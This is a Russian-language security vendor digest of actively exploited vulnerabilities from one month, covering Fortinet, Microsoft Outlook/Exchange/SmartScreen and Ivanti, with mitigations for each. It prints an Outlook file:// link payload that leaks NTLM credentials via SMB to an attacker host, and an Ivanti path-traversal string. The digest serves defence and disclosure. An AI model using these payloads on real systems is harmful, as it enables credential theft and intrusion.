Привет друзья! Я Александр Леонов, и вместе с отделом аналитиков Positive Technologies мы подготовили для вас дайджест трендовых уязвимостей за прошедший месяц.
Вы, наверно, сразу спросите: а что это за уязвимости такие — трендовые? Это опасные уязвимости, которые активно используются в атаках или с высокой вероятностью будут использоваться в ближайшее время.
При этом трендовые не тоже самое, что критические. Уязвимость может быть критической, способной потенциально «положить» работу массового сервиса на периметре организации, но при этом сложной в эксплуатации. Поэтому уязвимость вроде и есть, и критичная, а до реальной эксплуатации дело может дойти через месяцы и годы, а может совсем не дойти. А трендовые уязвимости несут опасность здесь и сейчас, поэтому и исправлять их требуется в первую очередь и кратчайшие сроки.
Определение трендовых уязвимостей — непростой процесс, требующий постоянного анализа множества источников данных. Подробнее о том, почему нельзя просто анализировать каталог CISA KEV и базу NVD, я писал в обзоре трендовых уязвимостей 2023 года.
А сейчас давайте посмотрим, какие же уязвимости были в тренде в ушедшем феврале.
Уязвимость в Fortinet FortiOS и FortiProxy
1. Уязвимость удаленного выполнения кода в Fortinet FortiOS и FortiProxy (CVE-2024-21762, CVSS — 9,8)
Эксплуатация уязвимости позволяет неаутентифицированному злоумышленнику выполнить произвольный код с помощью специально созданных HTTP-запросов. Уязвимость выполнения произвольного кода в Fortinet FortiOS и FortiProxy (CVE-2024-21762), по мнению вендора, используется в хакерских атаках. Ранее Fortinet сообщала о том, что злоумышленники использовали похожую уязвимость FortiOS для развертывания трояна удаленного доступа Coathanger.
В рекомендациях Fortinet не содержится никаких подробностей о том, как используется уязвимость или кто ее обнаружил.
Количество потенциальных жертв: опираясь на данные Shadowserver, количество устройств, у которых присутствует FortiOS SSL VPN, — более 465 000. В России это ПО выявлено на 2816 узлах, также по версии Shadowserver.
Публично доступные эксплойты: нет в открытом доступе.
⚔️ Способы устранения и компенсирующие меры: для устранения уязвимости требуется обновить ПО, следуя рекомендациям, заданным Fortinet. Если нет возможности немедленно загрузить обновления, для снижения рисков можно временно отключить SSL VPN на устройствах FortiOS. В России это ПО выявлено на 2638 узлах, по версии Shadowserver.
Уязвимости в продуктах Microsoft
1. Уязвимость обхода функции безопасности Windows SmartScreen (CVE-2024-21351, CVSS — 7,6)
В результате эксплуатации этой уязвимости злоумышленник получает возможность обойти проверки Windows Defender SmartScreen. Уязвимость может быть использована для доставки ВПО на систему. Для ее использования требуется взаимодействие с пользователем: киберпреступнику необходимо отправить цели специально созданный вредоносный файл и убедить его открыть содержимое, что может быть использовано при фишинге.
2. Уязвимость обхода функции безопасности ярлыков веб-страниц (CVE-2024-21412, CVSS — 8,1)
Эта уязвимость позволяет доставить вредоносное ПО на целевую систему. Для ее эксплуатации злоумышленнику необходимо отправить пользователю ссылку на контролируемый преступником ресурс, на котором размещен специально созданный файл с двойным расширением (*.jpeg.url). Этот файл, в свою очередь, указывает на другой файл ярлыка, содержащий логику для использования ранее исправленной уязвимости обхода SmartScreen в Microsoft Defender (CVE-2023-36025).
Сама фишинговая страница представляет из себя тег <a>на HTML-странице злоумышленника с названием картинки (*.jpg). Жертве остается только кликнуть на нее, подтвердить использование проводника и открыть сам файл.
Опасность заключается в том, что Microsoft Defender не предупреждает пользователя о том, что открытие идет с недоверенного ресурса (не отрабатывает функция MoTW). Пользователя также может запутать то, что проводник открывается в папке с названием Downloads («Загрузки»), хотя по факту она лежит на стороннем ресурсе.
3. Уязвимость в Microsoft Outlook, приводящая к удаленному выполнению кода (CVE-2024-21413, CVSS — 9,8)
Эксплуатация обходит Protected View в Microsoft Outlook, что позволяет удаленному злоумышленнику добиться открытия жертвой вредоносного документа в режиме редактирования, что может привести к удаленному выполнению кода в системе.
Суть атаки заключается в том, что пользователю в Outlook приходит письмо со ссылкой (тег <a> в HTML), которая с помощью протокола file обходит средства защиты Outlook и позволяет доставить жертве ссылку вида: <a href=” "file:///\\X.X.X.X\test\test.rtf!something”> Имя ссылки </a>, где X.X.X.X — адрес, находящийся в локальной сети (принадлежит злоумышленнику).
В этом случае доступ к файлу test.rtf!something будет осуществлен по протоколу SMB, а значит, будет раскрыта NTLM-информация о пользователе. Суффикс !something позволяет избежать предупреждений безопасности от Microsoft Outlook.
4. Уязвимость сервера Microsoft Exchange, приводящая к несанкционированному повышению привилегий (CVE-2024-21410, CVSS — 9,8)
Уязвимость повышения привилегий в Microsoft Exchange Server. Ее эксплуатация позволяет злоумышленнику провести атаку типа NTLM Relay (тип атаки, при котором атакующий перехватывает аутентификационные данные, использующие протокол NTLM, и перенаправляет их на другой сервер или сервис с целью получения несанкционированного доступа) и успешно пройти аутентификацию на сервере Exchange.
Случаи эксплуатации всех уязвимостей Microsoft: по данным Microsoft, зафиксированы факты эксплуатации всех уязвимостей. Кроме того, Trend Micro зафиксировала эксплуатацию уязвимости CVE-2024-21412 APT-группировкой Water Hydra. Их фишинговые кампании были направлены на трейдеров финансовых рынков.
Количество потенциальных жертв всех уязвимостей Microsoft: нет информации.
Публично доступные эксплойты: есть в открытом доступе для CVE-2024-21413, для остальных уязвимостей Microsoft — нет.
⚔️ Способы устранения, компенсирующие меры: для устранения уязвимости требуются обновления безопасности, их можно скачать с официального сайта Microsoft.
Уязвимости в продуктах Ivanti
1. Уязвимость обхода аутентификации в Ivanti Connect Secure и Policy Secure (CVE-2023-46805, CVSS — 8,2)
Эта уязвимость нулевого дня в программном обеспечении Ivanti Connect Secure (ICS), ранее известном как шлюз Pulse Connect Secure, и Ivanti Policy Secure. Уязвимость присутствует в версиях 9.x и 22.x и возникает из-за того, что сервер не осуществляет полноценную проверку доступа к файлам по одному из путей (/api/v1/totp/user-backup-code). В связи с этим неаутентифицированный злоумышленник может перемещаться по директориям сервера (api/v1/totp/user-backup-code/../../ для перемещения в родительские директории) и взаимодействовать с конечными точками в нем.
«Если CVE-2023-46805 используется совместно с CVE-2024-21887, эксплуатация не требует аутентификации и позволяет злоумышленнику создавать вредоносные запросы и выполнять произвольные команды в системе (Remote Code Execution)», — написали в Ivanti.
2. Уязвимость внедрения команд в Ivanti Connect Secure и Ivanti Policy Secure (CVE-2024-21887, CVSS — 9,1)
Это еще одна уязвимость нулевого дня в программном обеспечении Ivanti Connect Secure версий 9.x и 22.x. Она дает возможность злоумышленнику, аутентифицированному в роли администратора, выполнять произвольные команды на устройстве. Смысл эксплуатации заключается в том, что на конечную точку подается вредоносный аргумент, который во время обработки приложением попадает в функцию создания нового процесса или команды (например: popen(), Python). Эта уязвимость может быть проэксплуатирована через интернет.
Используя ее в связке с CVE-2023-46805, можно получить удаленное выполнение кода (Remote Code Execution) на узле, не требующее аутентификации.
3. Уязвимость подделки запроса на стороне сервера в продуктах Ivanti Connect Secure, Ivanti Policy Secure, Ivanti Neurons for ZTA (CVE-2024-21893, CVSS — 8,2)
Подделка запросов на стороне сервера (SSRF) присутствует в программном обеспечении Ivanti Connect Secure (ICS), в компоненте Security Assertion Markup Language (SAML). Возникает из-за отсутствия аутентификации, использования устаревшей версии XMLTooling, подверженной SSRF, для обработки данных XML на стороне сервера, а также из-за возможности отправлять вредоносные данные XML на конечную точку.
Случаи эксплуатации уязвимостей в продуктах Ivanti: 15 января Volexity сообщила, что нашла доказательства взлома более 1700 устройств, принадлежащих компаниям разного размера и из разных отраслей (например, организациям из финансового сектора, государственным компаниям, военным учреждениям).
Количество потенциальных жертв уязвимостей в продуктах Ivanti: по данным Shadowserver, в сети работает более 19 500 устройств Ivanti Connect Secure.
Публично доступные эксплойты: есть в открытом доступе.
⚔️ Способы устранения и компенсирующие меры: Ivanti выпустила обновления безопасности и восьмого февраля заявила, что устранила эти уязвимости в Ivanti Connect Secure (версии 9.1R14.5, 9.1R17.3, 9.1R18.4, 22.4R2.3, 22.5R1.2, 22.5R2.3 и 22.6R2.2), Ivanti Policy Secure (версии 9.1R17.3, 9.1R18.4 и 22.5R1.2) и ZTA-шлюзах (версии 22.5R1.6, 22.6R1.5 и 22.6R1.7). В тех случаях, когда обновления безопасности не установлены, можно использовать XML-файл, который доступен для клиентов Ivanti. Он позволяет смягчить воздействие от возможной эксплуатации. Агентство CISA выпустило статью с вариантами смягчения и устранения уязвимости.
Как защититься
Использование популярных продуктов, содержащих трендовые уязвимости, может поставить под угрозу любую компанию. Такие уязвимости являются наиболее опасными и требуют немедленного исправления. В систему управления уязвимостями MaxPatrol VM информация о трендовых уязвимостях поступает в течение 12 часов. Это позволяет своевременно принять меры по устранению наиболее опасных из них и защитить инфраструктуру.
Александр Леонов
Ведущий эксперт лаборатории PT Expert Security Center
